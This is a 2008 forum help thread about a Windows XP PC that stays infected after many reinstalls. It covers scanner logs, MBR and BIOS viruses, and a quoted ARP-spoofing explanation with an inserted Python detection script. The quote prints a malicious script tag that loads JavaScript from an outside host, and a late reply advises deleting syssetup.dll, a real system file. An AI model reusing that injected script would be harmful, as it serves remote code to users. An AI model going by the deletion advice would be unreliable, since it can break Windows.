TechSpot

Horribly infected XP machine

By elymcd
Nov 15, 2008
  1. Somehow caught a virus last week with no luck getting it to go away: scanners, antiviruses, safe mode repair install, recovery and zero-filled HD, and it's still there! About to give it a flying lesson. Currently scanning with MBAM and SuperAnti. I am on a different computer because the virus keeps disabling my network adapter and other services. Windows XP SP2 install untatted. Help me please!!! Be back in a min with HJ log.
     
  2. mflynn

    mflynn TS Rookie Posts: 2,655

    OK !

    When you can, UPDATE MBAM and SAS! Then unplug the network cable.

    1. Once MBAM completes and says it found and fixed anything, then reboot and run again until it comes up clean.

    2. Same with SAS run repeatedly until clean.

    3. Reboot, reattach the cable and send the logs from both programs.

    4. Open but don't run MBAM; click Logs and post all, beginning with the top one.

    5. In SAS click Preferences - Statistics/Logs, from top to bottom.

    Mike
     
  3. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Logs for my huge problem

    I updated Super and MBAM offline, both current. Last night I gave up on scanners and used Seagate tools and zero-filled, then reinstalled XP. I have not connected to the net; when I do I'm sending out 6-7 million packets and receiving less than 100. I have also reset my CMOS and run fixboot. Thank you in advance!
     

  4. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Cannot update online

    Sorry, I had already posted the logs, but I did try and neither MBAM nor Super nor any scanners for that matter will connect. The last Spybot I did said my HKLM/software/windows/ security had been disabled; I fixed it, then checked with regedit just now and they are all disabled again. Makes me crazy. Anyhow... think I'm gonna call it a night. Thank you again; hopefully in the morning somebody will have an idea of what's going on.
     
  5. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    It seems you have already done all this, but the normal route would be....

    The virus is in certain Windows start-up files, and disinfection is not permanent because it reappears at next boot. It takes an expert to remove this problem without having to reinstall Windows, and the chances are probably not good.

    I would recommend a hard disk wipe and reinstall. You want to get data off first? Write a bootable CD - say Ubuntu linux would be fine. With that booted, you can transfer all your important stuff to backup.

    You might like to replace the BIOS first of all, just in case of a BIOS virus (never heard of one, but best to be safe), followed by reinstall of Windows, including SP3, install anti-virus (Avast recommended), firewall (ZoneAlarm recommended), then finally update all recent patches from MS Update and your data. The virus could of course be in your data too, so a complete, deep scan would be a good idea - preferably before replacing on your hard drive.

    Since you are having trouble keeping a clean system, some people would say the infection is actually in one of your defensive programs, maybe Norton AV, so I would not install that at all; IMHO Avast is much better. Same goes for Windows Messenger etc. You will find that Avast has 7 specialised defenses for things like email, network, browsing, P2P, messaging, etc. etc., which is why it seems better to me. Free too!
     
  6. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Gonna try again

    I have backed up my info already to some DVDs, re-partitioned and low-level formatted; wouldn't that get rid of any startup files? I've thought about the BIOS as well, but small problem: I don't have a floppy drive to flash the BIOS, and that's the only way I know how. I have a Biostar I945G-M7, 1066 FSB, Intel D 3 GHz, 3 GB RAM. Right now my computer is close to being done with a fresh install; I'm gonna just install HijackThis, Spybot and the aforementioned antivirus. I'll post logs shortly.
     
  7. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    OK, I'm at a loss. Reinstalled, did Windows Update except SP3, 28 updates in total; Spybot current, MBAM current, Avast Home current. After reboot, Avast boot scan: no infections. Spybot S&D: 5 reg changes, Security Center disabled. Avast has found nothing. Network: LAN packets received 3,889, sent 95,000. So I dunno. Please help, I'm at a loss of what to do! I will post logs in a min.
     
  8. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    No Infections, All Lies!!!

    Did upgrade to SP3, same problems; something's destroying system files. My screen just changed to 16-bit and Windows appearance is weird, like in safe mode.
     
  9. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    This seems bad. A BIOS virus is a possibility. You can replace the BIOS by building a bootable CD (many sources) and adding the BIOS rebuilding file and executable to it. As long as some variety of DOS is running, that is enough, but the CD bit is essential to avoid running an infected OS (yes, even DOS).

    I suspect something you install or run immediately after re-installing Windows is infected. Be aware that once the infection is in memory, it is capable of hiding itself from all normal scans. The crucial thing is to be able to boot into an uninfected state, then run scans.

    There is not much danger in using an old PC as a sacrificial lamb. You install all the latest scanners on an old PC, attach your current hard drive in place of a CD, and run deep scans to see what is found and where, without any of it actually being executed.

    Your network symptoms do suggest a trojan. I have no idea if a router can be infected, but I suppose it can be.

    A more likely scenario is you are running a network in which another PC is infected. See here

    "English version:
    If you have the problem that in every loaded page a JavaScript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> appears, this is the solution for your problem.

    The cause is a trojan horse (virus) on another computer in your network!

    This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC, which forwards it to the internet and filters it in order to insert its malicious code.

    You can find out which computer is the evil one by typing the following into your command line:
    arp -a
    In the table that appears, search for a doubly assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
    Find out which computer is the other IP and you will have the virus host.
    Scan that one for viruses and malware (we are just about to conduct that scan)."
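The check quoted above (look through `arp -a` for one physical address that is listed both for the gateway and for some other IP) is easy to automate for a defender who wants to review a whole LAN's ARP tables rather than eyeball them. The script below is an added example, not code from the thread or from the quoted site; the `arp -a` output it parses is a constructed Windows XP-style sample in which an assumed host 192.168.1.37 shares the gateway's MAC, and the gateway address 192.168.1.1 is likewise an assumption.

```python
import re
from collections import defaultdict

# Constructed sample of Windows XP "arp -a" output (not captured from the
# thread's machine). 192.168.1.1 is the assumed gateway; 192.168.1.37 is an
# assumed LAN host that shows the same physical address, which is the
# symptom the quoted post describes.
SAMPLE_ARP_OUTPUT = """\
Interface: 192.168.1.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.20          00-11-22-33-44-55     dynamic
  192.168.1.37          00-1a-2b-3c-4d-5e     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

# One ARP table row: IPv4 address, MAC (dash- or colon-separated), type.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)\s*$"
)


def parse_arp_table(text):
    """Return a list of (ip, mac, type) tuples from arp -a style output.

    Header lines ("Interface: ...", column titles) do not match the row
    pattern and are skipped. MACs are normalised to lowercase dashes so that
    Windows (00-1a-...) and Unix (00:1a:...) formats compare equal.
    """
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((ip, mac.lower().replace(":", "-"), kind))
    return entries


def find_duplicate_macs(entries):
    """Map each MAC that is listed for more than one IP to those IPs."""
    by_mac = defaultdict(list)
    for ip, mac, _kind in entries:
        # Broadcast and IPv4 multicast entries legitimately repeat; ignore them.
        if mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e"):
            continue
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def suspected_spoofers(entries, gateway_ip):
    """IPs that share the gateway's MAC: hosts that may be posing as the gateway."""
    suspects = []
    for _mac, ips in find_duplicate_macs(entries).items():
        if gateway_ip in ips:
            suspects.extend(ip for ip in ips if ip != gateway_ip)
    return sorted(suspects)


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_OUTPUT)
    print("duplicate MACs:", find_duplicate_macs(table))
    print("hosts sharing the gateway MAC:", suspected_spoofers(table, "192.168.1.1"))
```

On a real machine, replace the constructed sample with the captured output of `arp -a` and pass the gateway address reported by `ipconfig`. A host that turns up in `suspected_spoofers` is the one to isolate and scan; a duplicate that does not involve the gateway is still worth a look, but can also be an ordinary case such as a NIC with several addresses.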
     
  10. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    I checked the HijackThis log- it may not still be valid, but here are some considerations:

    First, you need to disable TeaTimer for now:
    Second, there are policy restrictions preventing you from accessing:
    These have to be set by the Administrator. If they were not, have HijackThis remove them.
    Once done, see if you can run the three cleaning programs per:
    http://www.techspot.com/vb/topic58138.html

    When through, attach all three logs here for review.

    O23 - Service: W - Unknown owner - C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\W.exe (file missing)
     
  11. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Still somehow infected

    Did BIOS flash, Windows reinstall, and without hooking to the network... still infected. Could somebody point me in the direction to inspect startup files, 'cause obviously it's in that area? I'm computer savvy enough to deal with startup files; already used recovery and did fixmbr and boot commands with no luck... Is it possible for a DOS infection? If so, how do I scan and fix? Thank you, I'm desperate to find the problem! Thank you for all your responses and patience.
     
  12. mflynn

    mflynn TS Rookie Posts: 2,655

    You did a clean install with format?

    You did a new install without format?

    You did an overlay/repair install? If so all original files folders programs email etc should be there.

    If you did a new install without format, browse to the root of the boot drive (usually C:) and see if you now have 2 Windows folders:

    1 Windows folder, or
    a Windows folder and a Windows.000 or Winnt folder?

    Mike
     
  13. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    Post 1:
    Post 2:
    Post 3: Logs
    Post 6:
    Post 7:
    Post 8:
    Post 10:
    Post 11:
    Every time you did these re-installs, everything that had been done up to that point was undone. And putting updates, especially major updates like SP3, on an unstable system is asking for more trouble.

    I strongly suggest you stop the haphazard reinstalling, updating etc. and go back to Step 1 and begin anew. Post the log, they will be reviewed and if additional programs are indicated, they will be suggested. http://www.techspot.com/vb/topic58138.html

    This is going nowhere.
     
  14. mflynn

    mflynn TS Rookie Posts: 2,655

    You said that right Bobbye!:)

    Mike
     
  15. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    Possible case of MBR virus. Your best chance of removing this is to buy a new hard disk and reinstall, but ONLY from a CD guaranteed to be original. Same goes for everything you use to update Windows. The service packs (downloaded), the anti-virus, firewall (downloaded): they can all be infected.

    See here: "Don't be a victim of Sinowal, the super-Trojan" at http://windowssecrets.com/comp/081120/ which gives a rather frightening picture, but explains why you can scan your PC after a fresh install without seeing anything, because the virus does not activate for many minutes. It is not necessarily that one you have, but very probably some form of MBR virus.
     
  16. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Going back to square one... attempting to... Did full zero fill; now XP won't install, saying cannot copy files cmnicfg.xml and many others. When I get installed I will scan and post fresh logs and see where I get from there. Don't know if it matters, but I cannot use my Seagate DiscWizard to zero fill from that machine; the program files will not load and it puts me back to Ctrl-Alt-Del to restart. However, it works flawlessly on my sacrificial PC. Maybe a related symptom, maybe not?
     
  17. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Back at one, something not right

    Alright guys, unfortunately I'm back. Finally got reinstalled; not doing it again, obviously not helping, lol. Anyhow, the only thing I've done is install antivirus, SuperAntiSpy, etc. Here are the three logs you requested. Please help!! Also I am still sending an ungodly amount of packets while at idle, and there is a small padlock icon in my network details that I've only seen when there is limited or no connectivity; however I'm connected fine as far as I can tell.
     
  18. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    Okay, I'm going to start all over!

    Mbam log is clean.
    SAS log is clean.
    Hijack entries are okay but you ran an outdated version. Is this what you've been using all the time? Please run one more HijackThis using v2.0.2 here:
    http://www.download.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html


    Can you be more specific about the current problem? What are the 'packets' you're referring to? If you have any programs on auto-update, they are going to be accessing the internet frequently looking for updates. So that would account for some activity.

    So why is this bothering you? If the HijackThis log comes out clean, we'll remove the cleaning tools and in the absence of any new problem will conclude this cleaning.

    Do NOT repair/reformat or reinstall again.
    Do not use System Restore; we need to clean the old points.
     
  19. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    That's good news... I hope

    The problem I have with the packets is just the ratio of sent versus received. I haven't paid that much attention to it in the past, but I'm sure I would have noticed that huge of a difference; I noticed it after I got infected in the first place. Currently the packet count AT IDLE is... SENT: 438,318 and RECEIVED: 69. Not sure if that's OK; it just doesn't seem right. Maybe you could shed some light on this. I very much appreciate your help. I will post an updated HJ.
     
  20. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Oops

    Sorry 'bout that, here's the HJ.
     
  21. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    I suppose I ought to ask the obvious question - where are you getting the figure for packets sent from? Maybe that is since your broadband connection started? Two years ago.....???

    Try looking at the network connections icon in Control Panel - double click on the local network connection, and what do you see? After half an hour web-browsing I get sent 911,266 bytes, received 2,272,373 for instance on the network bridge. On the other hand, Local Area Connection says sent packets 3,872, received packets 3,375.
     
  22. bushwhacker

    bushwhacker TechSpot Chancellor Posts: 783

    HijackThis site says....

    looks suspicious. It says it's nasty.
     
  23. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Packets

    I'm getting the packets info from the Local Area Connection status via Control Panel > Network Connections > Local Area Connection. On the machine I'm on now the sent and received are close to the same, about like yours.
     
  24. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    What about a rootkit? Could that be the case? If so, what do you recommend?
     
  25. bushwhacker

    bushwhacker TechSpot Chancellor Posts: 783

    Use the Panda Anti-Rootkit, which can be found here.

    Other than that, my recommendation is to boot in safe mode and delete the syssetup.dll and syssetub.dll and fix the info I provided to you.
     